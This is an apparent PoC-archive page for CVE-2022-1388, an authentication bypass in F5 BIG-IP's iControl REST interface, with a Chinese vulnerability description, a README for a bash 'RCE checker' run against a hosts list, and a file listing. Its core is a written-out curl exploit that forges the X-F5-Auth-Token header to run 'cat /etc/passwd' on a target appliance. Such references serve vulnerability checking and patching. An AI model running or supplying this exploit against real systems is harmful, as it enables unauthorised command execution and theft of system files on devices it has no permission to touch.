Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
Readme
# CVE-2022-1388 RCE checker

Simple bash script to check CVE-2022-1388 RCE (F5 BIG-IP).

[+] Usage: `./CVE-2022-1388.sh hosts.txt`

# [CVE-2022-1388 RCE POC Exploit](https://www.exploitcve.com/2022/05/cve-2022-1388-F5-rce-exploit-poc.html)

Don't forget to change the [IP address](https://myipv4address.com/)
```
curl -X POST http://10.0.0.1/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-alive, X-F5-Auth-Token" -H "X-F5-Auth-Token: anything"
```
 
File Snapshot

[4.0K] /data/pocs/e2fe4c1cc0a2242cb6964bb4ff2884e9c764a8be ├── [1.4K] CVE-2022-1388.sh ├── [4.0K] <h1>henlo< │   └── [ 5] h1> └── [ 500] README.md 1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.